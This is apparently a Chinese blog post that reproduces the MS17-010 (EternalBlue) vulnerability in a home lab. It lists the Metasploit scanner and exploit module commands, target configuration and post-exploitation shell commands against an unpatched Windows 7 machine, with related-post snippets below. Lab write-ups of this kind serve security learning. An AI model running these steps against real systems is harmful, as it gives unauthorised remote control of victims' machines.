MS17-010(永恒之蓝)复现

已于 2023-01-15 10:27:59 修改
阅读量431 收藏 1
点赞数 2
文章标签: 安全 web安全 网络
于 2023-01-11 10:57:46 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_52701599/article/details/128640623
版权

复现环境:

  1. 靶机:windows7(IP:192.168.8.145) 存在永恒之蓝的漏洞。
  2. 攻击机:kali-linux(IP:192.168.8.139)。
  3. 实验条件:两台机器之间可以相互ping通,并且windows7机器(无补丁)开启了445端口且防火墙是关闭的。

 复现过程:

1.打开MSF,输入命令:msfconsole打开msf后找msf的脚本,输入命令:search ms17-010 。

   #搜索msf中和ms17-010漏洞有关的脚本

 2.使用ms17-010的辅助性脚本use auxiliary/scanner/smb/smb_ms17_010。  3.配置ms17-010的辅助性脚本。

查看有哪些项需要进行配置:show options                  

 配置要攻击的靶机的ip地址set rhosts 192.168.8.145

 配置完成后,执行ms17-010的辅助性脚本:run #运行模块。

 4.使用ms17-010攻击性模块use exploit/windows/smb/ms17_010_eternalblue。

5.查看配置项:show options。

设置被攻击机器ipset rhosts 192.168.8.145

 运行ms17-010攻击模块run

攻击完成成功建立会话。

6.得到靶机的shell。

7.进入终端可以利用一些常见的命令,得到靶机的信息。

例如:systeminfo#查看靶机信息、ipconfig #查看靶机网络配置、ps #查看靶机正在运行的进程

8.页面如果出现了中文乱码问题,输入:chcp 65001 可解决乱码问题。

以上就完成了对永恒之蓝漏洞的复现操作,希望可以帮助到大家。

六十亿少女的梦
关注
  • 2
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
渗透基础笔记+作业(永恒之
09-08
渗透基础+永恒之 漏洞挖掘 win7 ms17-010
MS17-010永恒之漏洞(手把手教程,超细!)
qq_46089119的博客
02-06 6345
ms17-010漏洞利用(本地环境)
MS17-010漏洞
Al345__的博客
07-01 1159
1、永恒之介绍:永恒之漏洞(MS17-010),它的爆发源于 WannaCry 勒索病毒的诞生,该病毒是不法分子利用NSA(National Security Agency,美国国家安全局)泄露的漏洞 “EternalBlue”(永恒之)进行改造而成。勒索病毒的肆虐,俨然是一场全球性互联网灾难,给广大电脑用户造成了巨大损失。据统计,全球100多个国家和地区超过10万台电脑遭到了勒索病毒攻击、感染。
永恒之漏洞(详细版)
最新发布
Zqinglele的博客
03-20 1969
matesploit框架(Matesploit Framework,MSF)是一个开源工具,由Ruby程序语言编写的模块化框架,主要为后端提供用来测试的端口(如控制台、Web、CLI)。常用为控制台接口,通过该接口可以访问matesploit框架的所有插件(如payloads、利用模块、post模块等),还可使用第三方程序的插件(如sqlmap、nmap等)。这下只需配置靶机IP地址、命名的管道、端口、线程数(后三个已经配置好了)成功发可利用漏洞ms17-010,,扫描模块结束,接下尝试进行攻击。
永恒之MS17-010)漏洞
tubug的博客
05-21 5348
2017 年 4 月 14 日晚,黑客团体 Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒之”工具,“永恒之”利用 Windows 系统的 SMB 漏洞可以获取系统最高权限。5 月 12 日,不法分子通过改造“永恒之”制作了 wannacry 勒索病毒,英国、俄罗斯、整个欧洲以及中国国内多个高校校内网、大型企业内网呾政府机构与网中招,被勒索支付高额赎金才能解密恢文件。.........
永恒之漏洞(ms17-010)
热门推荐
good good study
01-20 2万+
Metasploit Framework(MSF)是一款开源安全漏洞检测工具,附带数千个已知的软件漏洞,并保持持续更新。Metasploit可以用来信息收集、漏洞探测、漏洞利用等渗透测试的全流程,被安全社区冠以“可以黑掉整个宇宙”之名。刚开始的Metasploit是采用Perl语言编写的,但是再后来的新版中,改成了用Ruby语言编写的了。在kali中,自带了Metasploit工具。
Windows下的MS17-010(永恒之)漏洞分析与
dgjkkhcf的博客
07-20 1万+
永恒之漏洞(MS17-010),它的爆发源于 WannaCry 勒索病毒的诞生,该病毒是不法分子利用美国国家安全局泄露的漏洞 “EternalBlue”(永恒之)进行改造而成 ,“永恒之”是利用Windows系统的SMB漏洞来获取Windows系统的最高权限。.........
ms17-010(永恒之) 漏洞与处理
diaobusi的博客
06-05 1万+
ms17_010 是一种操作系统漏洞,仅影响 Windows 系统中的 SMBv1 服务。这个漏洞是由于 SMBv1 内核函数中的缓冲区溢出而导致的。攻击者可以通过该漏洞控制目标系统,并执行任意代码。这个漏洞通过 445 文件共享端口进行利用,一旦攻击者成功利用该漏洞,就可以在目标主机上植入各种恶意软件,如勒索软件。最近出的 WannaCry 勒索软件就使用 ms17_010 漏洞来传播和植入勒索代码,将目标系统中的所有文件加密并威胁用户付款。
永恒之 MS17-010漏洞
春日野穹
12-21 1495
目录导航 一. 环境 二. 漏洞原理 1.漏洞简介 2.漏洞原理代码详解 三. 漏洞 1.信息收集 2.漏洞探测 3.漏洞利用 一. 环境 工具:msf 攻击机:Kali linux 虚拟机一台 ip: 169.254.93.24 测试机:Windows 2008 r2 虚拟机一台 ip: 169.254.93.243 网络环境:手机WiFi网络USB共享,同一局域网,桥接网络模...
永恒之(个人申明,此为个人学习的笔记,可能摘录自他人的文章,而非原创)
2301_76881678的博客
03-21 1627
永恒之漏洞的(单人版)
永恒之漏洞
m0_75178803的博客
06-11 400
(控制面板——编辑组——管理工具编辑组策略——本地计算机策略——计算机配置——windows设置——安全设置——本地策略——安全选项)终端输入nmap -sP 对在192.168.75.xxx网段下的所有电脑进行简单的ping扫描(不进行端口扫描)终端输入nmap -p,通过扫描端口,用端口的是否启用来获取靶机ip。创建新的管理员账户,账户名123,密码123(在shell控制台下)查看目标靶机的本地用户(在目标主机的shell控制台下)获取靶机的本地用户的密码(在meterpreter下)
【渗透测试:MS17_010(永恒之)漏洞与分析】
qq_61947585的博客
07-14 1216
永恒之(Eternal Blue)爆发于2017年4月14日晚,是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机。甚至于2017年5月12日, 不法分子通过改造“永恒之”制作了wannacry程序,使全世界大范围内遭受了该程序,甚至波及到学校、大型企业、政府等机构,只能通过支付高额的赎金才能恢出文件。不过在该程序出来不久就被微软通过打补丁修
ms17-010永恒之漏洞
xiaosiyue77的博客
05-30 689
ms17-010永恒之漏洞
永恒之 利用(
nszmsjhshs的博客
03-11 6547
永恒之早在2017年4月15日黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒之”工具,“永恒之”是利用Windows系统的SMB(445)漏洞可以跳过密码直接获取系统最高权限。这还没让我们对它得到重视,然而随后发生的一件事让它就此名声大噪或者说臭名昭著,那就是用它加以改造的wannacry 勒索病毒。它刚一出就引起波然大动,全球各国都有地方受到攻击。被袭击的设备被锁定,并索要300美元比特币赎金。要求尽快支付勒索赎金,否则将删除文件,甚至提出半年后如果还没支
ms17-010(永恒之)漏洞
Filotimo_的博客
09-09 1929
ms17-010(永恒之)利用的端口是445端口。本文主要讲解ms17-010(永恒之)漏洞

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值